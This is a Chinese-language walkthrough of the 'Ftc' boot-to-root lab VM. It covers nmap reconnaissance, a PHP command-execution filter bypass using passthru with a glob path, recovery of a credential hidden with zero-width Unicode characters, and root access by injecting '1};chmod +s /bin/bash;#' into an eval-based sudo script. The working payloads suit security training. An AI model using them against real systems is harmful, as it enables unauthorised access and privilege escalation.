Mazesec_Ftc

靶机来源:QQ群-660930334

难度:Low

一、信息收集

1、主机探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-05 09:55 CST
Nmap scan report for 192.168.2.1
Host is up (0.00061s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00053s latency).
MAC Address: 08:00:27:02:7F:AE (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.106
Host is up (0.00085s latency).
MAC Address: 08:00:27:C9:A1:AB (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.02 seconds

靶机IP:192.168.2.106

2、端口扫描

1.全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.106                       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-05 09:55 CST
Nmap scan report for 192.168.2.106
Host is up (0.00044s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy
MAC Address: 08:00:27:C9:A1:AB (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.93 seconds

开放端口:22、80、8080

2.详细信息扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,8080 192.168.2.106
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-05 09:56 CST
Nmap scan report for 192.168.2.106
Host is up (0.0011s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    (PHP 8.2.29)
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.0 200 OK
|     Date: Wed, 07 Jan 2026 06:59:51 GMT
|     Connection: close
|     X-Powered-By: PHP/8.2.29
|     Content-type: text/html; charset=UTF-8
|     <code><span style="color: #000000">
|     <span style="color: #0000BB">&lt;?php
|     />error_reporting</span><span style="color: #007700">(</span><span style="color: #0000BB">0</span><span style="color: #007700">);
|     /></span><span style="color: #0000BB">highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);
|     /></span><span style="color: #FF8000">//&nbsp;
|     flag
|     /></span><span style="color: #0000BB">$funtion&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'function'</span><span style="color: #007700">];
|_    /></span><span style="color: #0000BB">
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
8080/tcp open  http    (PHP 8.2.29)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Date: Wed, 07 Jan 2026 06:59:51 GMT
|     Connection: close
|     X-Powered-By: PHP/8.2.29
|_    Content-type: text/html; charset=UTF-8
|_http-open-proxy: Proxy might be redirecting requests
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.94SVN%I=7%D=1/7%Time=695E0468%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,80E,"HTTP/1\.0\x20200\x20OK\r\nDate:\x20Wed,\x2007\x20Jan\x202
SF:026\x2006:59:51\x20GMT\r\nConnection:\x20close\r\nX-Powered-By:\x20PHP/
SF:8\.2\.29\r\nContent-type:\x20text/html;\x20charset=UTF-8\r\n\r\n<code><
SF:span\x20style=\"color:\x20#000000\">\n<span\x20style=\"color:\x20#0000B
SF:B\">&lt;\?php\r<br\x20/>error_reporting</span><span\x20style=\"color:\x
SF:20#007700\">\(</span><span\x20style=\"color:\x20#0000BB\">0</span><span
SF:\x20style=\"color:\x20#007700\">\);\r<br\x20/></span><span\x20style=\"c
SF:olor:\x20#0000BB\">highlight_file</span><span\x20style=\"color:\x20#007
SF:700\">\(</span><span\x20style=\"color:\x20#0000BB\">__FILE__</span><spa
SF:n\x20style=\"color:\x20#007700\">\);\r<br\x20/></span><span\x20style=\"
SF:color:\x20#FF8000\">//&nbsp;\xe6\xa0\xb9\xe7\x9b\xae\xe5\xbd\x95\xe4\xb
SF:8\x8b\xe7\x9a\x84flag\r<br\x20/></span><span\x20style=\"color:\x20#0000
SF:BB\">\$funtion&nbsp;</span><span\x20style=\"color:\x20#007700\">=&nbsp;
SF:</span><span\x20style=\"color:\x20#0000BB\">\$_POST</span><span\x20styl
SF:e=\"color:\x20#007700\">\[</span><span\x20style=\"color:\x20#DD0000\">'
SF:function'</span><span\x20style=\"color:\x20#007700\">\];\r<br\x20/></sp
SF:an><span\x20style=\"color:\x20#0000BB\">")%r(HTTPOptions,80E,"HTTP/1\.0
SF:\x20200\x20OK\r\nDate:\x20Wed,\x2007\x20Jan\x202026\x2006:59:51\x20GMT\
SF:r\nConnection:\x20close\r\nX-Powered-By:\x20PHP/8\.2\.29\r\nContent-typ
SF:e:\x20text/html;\x20charset=UTF-8\r\n\r\n<code><span\x20style=\"color:\
SF:x20#000000\">\n<span\x20style=\"color:\x20#0000BB\">&lt;\?php\r<br\x20/
SF:>error_reporting</span><span\x20style=\"color:\x20#007700\">\(</span><s
SF:pan\x20style=\"color:\x20#0000BB\">0</span><span\x20style=\"color:\x20#
SF:007700\">\);\r<br\x20/></span><span\x20style=\"color:\x20#0000BB\">high
SF:light_file</span><span\x20style=\"color:\x20#007700\">\(</span><span\x2
SF:0style=\"color:\x20#0000BB\">__FILE__</span><span\x20style=\"color:\x20
SF:#007700\">\);\r<br\x20/></span><span\x20style=\"color:\x20#FF8000\">//&
SF:nbsp;\xe6\xa0\xb9\xe7\x9b\xae\xe5\xbd\x95\xe4\xb8\x8b\xe7\x9a\x84flag\r
SF:<br\x20/></span><span\x20style=\"color:\x20#0000BB\">\$funtion&nbsp;</s
SF:pan><span\x20style=\"color:\x20#007700\">=&nbsp;</span><span\x20style=\
SF:"color:\x20#0000BB\">\$_POST</span><span\x20style=\"color:\x20#007700\"
SF:>\[</span><span\x20style=\"color:\x20#DD0000\">'function'</span><span\x
SF:20style=\"color:\x20#007700\">\];\r<br\x20/></span><span\x20style=\"col
SF:or:\x20#0000BB\">");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8080-TCP:V=7.94SVN%I=7%D=1/7%Time=695E0468%P=x86_64-pc-linux-gnu%r(
SF:GetRequest,902,"HTTP/1\.0\x20200\x20OK\r\nDate:\x20Wed,\x2007\x20Jan\x2
SF:02026\x2006:59:51\x20GMT\r\nConnection:\x20close\r\nX-Powered-By:\x20PH
SF:P/8\.2\.29\r\nContent-type:\x20text/html;\x20charset=UTF-8\r\n\r\n\xe5\
SF:x8f\xaf\xe6\x83\x9c\xe6\xb2\xa1\xe5\xa6\x82\xe6\x9e\x9c\r\n\xe6\x9e\x97
SF:\xe4\xbf\x8a\xe6\x9d\xb0\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8
SF:c\xe2\x80\x8d\xef\xbb\xbf\xe2\x80\xac\xe2\x80\x8c\r\n\xe5\x81\x87\xe5\x
SF:a6\x82\xe6\x8a\x8a\xe7\x8a\xaf\xe5\xbe\x97\xe8\xb5\xb7\xe7\x9a\x84\xe9\
SF:x94\x99\r\n\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8d
SF:\xe2\x80\xac\xef\xbb\xbf\xe2\x80\x8d\xe8\x83\xbd\xe9\x94\x99\xe7\x9a\x8
SF:4\xe9\x83\xbd\xe9\x94\x99\xe8\xbf\x87\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x
SF:8c\xe2\x80\x8c\xe2\x80\x8d\xe2\x80\xac\xe2\x80\x8d\xef\xbb\xbf\r\n\xe5\
SF:xba\x94\xe8\xaf\xa5\xe8\xbf\x98\xe6\x9d\xa5\xe5\xbe\x97\xe5\x8f\x8a\xe5
SF:\x8e\xbb\xe6\x82\x94\xe8\xbf\x87\r\n\xe5\x81\x87\xe5\xa6\x82\xe6\xb2\xa
SF:1\xe6\x8a\x8a\xe4\xb8\x80\xe5\x88\x87\xe8\xaf\xb4\xe7\xa0\xb4\r\n\xe9\x
SF:82\xa3\xe4\xb8\x80\xe5\x9c\xba\xe5\xb0\x8f\xe9\xa3\x8e\xe6\xb3\xa2\xe5\
SF:xb0\x86\xe4\xb8\x80\xe7\xac\x91\xe5\xb8\xa6\xe8\xbf\x87\r\n\xe2\x80\x8c
SF:\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8d\xe2\x80\xac\xef\xbb\xb
SF:f\xe2\x80\x8d\xe5\x9c\xa8\xe6\x84\x9f\xe6\x83\x85\xe9\x9d\xa2\xe5\x89\x
SF:8d\xe8\xae\xb2\xe4\xbb\x80\xe4\xb9\x88\xe8\x87\xaa\xe6\x88\x91\xe2\x80\
SF:x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8d\xef\xbb\xbf\xe2\x80
SF:\xac\xe2\x80\x8c\r\n\xe8\xa6\x81\xe5\xbe\x97\xe8\xbf\x87\xe4\xb8\x94\xe
SF:8\xbf\x87\xe6\x89\x8d\xe5\xa5\xbd\xe8\xbf\x87\r\n\xe5\x85\xa8\xe9\x83\x
SF:bd\xe6\x80\xaa\xe6\x88\x91\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\
SF:x8c\xe2\x80\x8d\xe2\x80\xac\xe2\x80\xac\xe2\x80\xac\r\n\xe4\xb8\x8d\xe8
SF:\xaf\xa5\xe6\xb2\x89\xe9\xbb\x98\xe6\x97\xb6\xe6\xb2\x89\xe9\xbb\x98\xe
SF:8\xaf\xa5\xe5\x8b\x87\xe6\x95\xa2\xe6\x97\xb6\xe8\xbd\xaf\xe5\xbc\xb1\r
SF:\n\xe5\xa6\x82\xe6\x9e\x9c\xe4\xb8\x8d\xe6\x98\xaf\xe6\x88\x91\r\n\xe8\
SF:xaf\xaf\xe4\xbc\x9a\xe8\x87\xaa\xe5\xb7\xb1\xe6\xb4\x92\xe8\x84\xb1\xe8
SF:\xae\xa9\xe6\x88\x91\xe4\xbb\xac\xe9\x9a\xbe\xe8\xbf\x87\xe2\x80\x8c\xe
SF:2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8d\xef\xbb\xbf\xe2\x80\x8c\x
SF:ef\xbb\xbf\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\
SF:xef\xbb\xbf\xe2\x80\xac\xe2\x80\xac\r\n\xe5\x8f\xaf\xe5\xbd\x93\xe5\x88
SF:\x9d\xe7\x9a\x84\xe4\xbd\xa0\xe5\x92\x8c\xe7\x8e\xb0\xe5\x9c\xa8\xe7\x9
SF:a\x84\xe6\x88\x91\r\n\xe5\x81\x87\xe5\xa6\x82\xe9\x87\x8d\xe6\x9d\xa5\x
SF:e8\xbf\x87\r\n\xe5\x80\x98\xe8\x8b\xa5\xe9\x82\xa3\xe5\xa4\xa9\r\n\xe2\
SF:x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8d\xe2\x80\x8d\xe2
SF:\x80\x8c\xef\xbb\xbf\xe6\x8a\x8a\xe8\xaf\xa5\xe8\xaf\xb4\xe7\x9a\x84\xe
SF:8\xaf\x9d\xe5\xa5\xbd\xe5\xa5\xbd\xe8\xaf\xb4\r\n\xe8\xaf\xa5\xe4\xbd\x
SF:93\xe8\xb0\x85\xe7\x9a\x84\xe4\xb8\x8d\xe6\x89\xa7\xe7\x9d\x80\r\n\xe5\
SF:xa6\x82\xe6\x9e\x9c\xe9\x82\xa3\xe5\xa4\xa9\xe6\x88\x91\r\n\xe4\xb8\x8d
SF:\xe5\x8f\x97\xe6\x83\x85\xe7\xbb\xaa\xe6\x8c\x91\xe6\x8b\xa8\xe2\x80\x8
SF:c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8d\xef\xbb\xbf\xe2\x80\x
SF:ac\xe2\x80\x8d\r\n\xe4\xbd\xa0\xe4\xbc\x9a\xe6\x80\x8e\xe4\xb9\x88\xe5\
SF:x81\x9a\r\n\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8c\xe2\x80\x8d
SF:\xe2\x80\xac\xe2\x80\x8c\xe2\x80\x8d");
MAC Address: 08:00:27:C9:A1:AB (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.20 seconds

3.udp扫描

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.106                         
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-05 09:57 CST
Nmap scan report for 192.168.2.106
Host is up (0.0018s latency).
All 100 scanned ports on 192.168.2.106 are in ignored states.
Not shown: 57 closed udp ports (port-unreach), 43 open|filtered udp ports (no-response)
MAC Address: 08:00:27:C9:A1:AB (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 54.57 seconds

二、WEB渗透

1、80端口

查看80端口,发现是一段php命令执行代码

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
error_reporting(0);
highlight_file(__FILE__);
// 根目录下的flag
$funtion = $_POST['function'];
$args = $_POST['args'];

if(!preg_match("/system|exec|eval|phpinfo/i",$funtion)&&!preg_match("/(cat|ls|f|l|g|more|head|grep|r|sort|ph|n|less|e|[\\\_~*?\$])/i",$args)){
$funtion($args);
}
else {
    echo "nonono";
}

经过分析,没有过滤函数passthru,尝试执行命令

1
function=passthru&args=id

尝试读取根目录下面的flag

1
function=passthru&args=tac /[a-z][a-z]a[a-z]


找到FLAG:LlB45/KQFm

2、8080端口

访问8080端口,发现是一首歌词

提示是unicode零宽字符隐写
Unicode Steganography with Zero-Width Characters

找到:xmgmxjs:SyalwLO+pmWicb......

结合之前拿到的FLAG,拼接起来组合成一组凭据xmgmxjs:SyalwLO+pmWicbLlB45/KQFm

三、获取xmgmxjs权限

使用凭据进行登录

1
2
3
4
┌──(root㉿kali)-[/miaosec]
└─# ssh xmgmxjs@192.168.2.106
xmgmxjs@FCT:~$ id
uid=1000(xmgmxjs) gid=1000(xmgmxjs) groups=1000(xmgmxjs)

四、权限提升

查看sudo -l

1
2
3
4
5
6
7
8
9
10
xmgmxjs@FCT:~$ sudo -l
Matching Defaults entries for xmgmxjs on FCT:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for xmgmxjs:
    Defaults!/usr/bin/sqlmap, !/usr/bin/sqlmap *--tamper* env_reset

User xmgmxjs may run the following commands on FCT:
    (root) NOPASSWD: /usr/bin/sqlmap, !/usr/bin/sqlmap *--tamper*
    (ALL) NOPASSWD: /opt/123.sh

查看/opt/123.sh

1
2
3
4
5
6
7
8
xmgmxjs@FCT:~$ grep . /opt/123.sh 
#!/bin/bash
if [ "${#1}" -eq 2 ]; then
          eval cat $1.hidden
fi
if [ "${#1}" -gt 2 ]; then
          eval echo \${FTC_${1}:-$HOME}
fi

脚本限制了第一个参数 $1 的长度必须等于 2
我们要利用 eval 的特性,传入一个长度为 2 的特殊变量,让它在 eval 执行时展开成我们在后续参数中隐藏的恶意命令

1
2
3
xmgmxjs@FCT:~$ sudo /opt/123.sh '1};id;#'

uid=0(root) gid=0(root) groups=0(root)

获取root权限

1
2
3
4
5
6
7
8
xmgmxjs@FCT:~$ sudo /opt/123.sh '1};chmod +s /bin/bash;#'

xmgmxjs@FCT:~$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash

xmgmxjs@FCT:~$ /bin/bash -p
bash-5.0# id
uid=1000(xmgmxjs) gid=1000(xmgmxjs) euid=0(root) egid=0(root) groups=0(root),1000(xmgmxjs)

五、查看FLAG

1
2
3
bash-5.0# tac /root/root.txt /home/xmgmxjs/user.txt 
flag{root-jyt/DLUwE8JEy2v5EuykzPeL}
flag{user-JLUSoJGCnTndpKfYIcPT0AZa}
Maze-sec
#PHP命令执行 #unicode零宽字符隐写
Mazesec_Ftc
http://miao-sec.github.io/Maze-sec/Mazesec_Ftc/
作者
Miao
发布于
2026年1月9日
许可协议
BY-MIAO